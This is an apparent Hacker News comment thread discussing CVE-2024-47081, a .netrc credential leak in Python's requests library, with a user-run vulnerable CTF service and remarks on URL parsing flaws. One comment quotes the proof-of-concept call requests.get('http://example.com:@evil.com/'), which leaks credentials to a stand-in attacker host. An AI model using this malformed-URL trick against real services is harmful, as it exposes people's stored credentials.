Settings

Theme

CVE-2024-47081: Netrc credential leak in PSF requests library

seclists.org

62 points by jupenur 9 months ago · 27 comments

Reader
janzer 9 months ago

Given that the actual vulnerability seems relatively niche along with it being such a popular library officially maintained by the Python foundation, the scariest line in the advisory is almost certainly:

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

Daviey 9 months ago

Well, it's probably just a coincidence, but I literally just spun up a web service that is vulnerable to this: https://isitup.daviey.com/

The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:

  machine localhost
  login *REDACTED*
  password CTF{*REDACTED*}
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.

First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.

  • dgl 9 months ago 

      Sorry, you have been blocked
  You are unable to access daviey.com
    Looks like Cloudflare has decided the whole thing is dodgy. Or doesn't like my IP address...
    • Daviey 9 months ago

      That's really strange... because it seems to be working for some people (already have the first solve). I can't see an issues in CF...

      EDIT: I had the security in CF too robust, try now?

  • progbits 9 months ago

    Edit: Comment removed on request of parent.

    • Daviey 9 months ago

      Well done for solving it.. but I'd have preferred you had not shared the solution, it's against the spirit of these sorts of things, but I can't stop you. :)

      EDIT: I do appreciate you removing the solution. Have a great day.

woodruffw 9 months ago

Another good example of lax URL parsing/parser differentials being problematic.

That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.

  • w7 9 months ago

    I think it may be in use by tools without people being aware. I decided to check my workstation for it just in case, figuring the file would be empty, or not exist.

    Instead it seems to be populated with what seem to be Heroku API and git credentials.

awoimbee 9 months ago

That's some horrible url parsing code...

But honestly urllib sucks:

url.hostname doesn't return the port url.netloc also returns the basic auth part So you have to f"{u.hostname}:{u.port}"

  • edelbitter 9 months ago

    Wait till you see the cPython stdlib email parser..

    Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.

audiodude 9 months ago

If you, like me, have never heard of a .netrc file...

https://everything.curl.dev/usingcurl/netrc.html

  • neilv 9 months ago

    There might be a funny thing with FTP, in which, if a company is using FTP, it's probably for something important.

    (Even if it's a bad idea now, and compromise of it could result in a bad quarter or regulatory action, legacy systems and priorities happen.)

pixl97 9 months ago

Execute the call

>requests.get('http://example.com:@evil.com/')

>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call

Instead of having a url parse error it appears to drop the : and use the password:domain format.

zx8080 9 months ago

A funny commit message in the root cause (as stated in the linked post) commit:

> Push code review advice from @sigmavirus24

  • sionisrecur 9 months ago

    To be fair, the advice from sigmavirus24 was about dealing with decoding the ':' character: https://github.com/psf/requests/pull/2936/files

    The code already had `host = ri.netloc.split(':')[0]` before that.

    The actual root issue is urlparse doesn't split the host, user, pass and port and trying to do it manually is very error prone:

        urllib.parse.urlparse('http://example.com:@evil.com:8080/')
    ParseResult(scheme='http', netloc='example.com:@evil.com:8080', path='/', params='', query='', fragment='')
    Compare this with php:

        parse_url ('http://example.com:@evil.com:8080/')
    [
        "scheme" => "http",
        "host" => "evil.com",
        "port" => 8080,
        "user" => "example.com",
        "pass" => "",
        "path" => "/",
    ]
  • dfedbeef 9 months ago

    I feel this

Daviey 9 months ago

Patch has now been merged, seems the Full Disclosure process works, https://github.com/psf/requests/pull/6965

dcrazy 9 months ago

> The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

Keyboard Shortcuts

j
Next item
k
Previous item
o / Enter
Open selected item
?
Show this help
Esc
Close modal / clear selection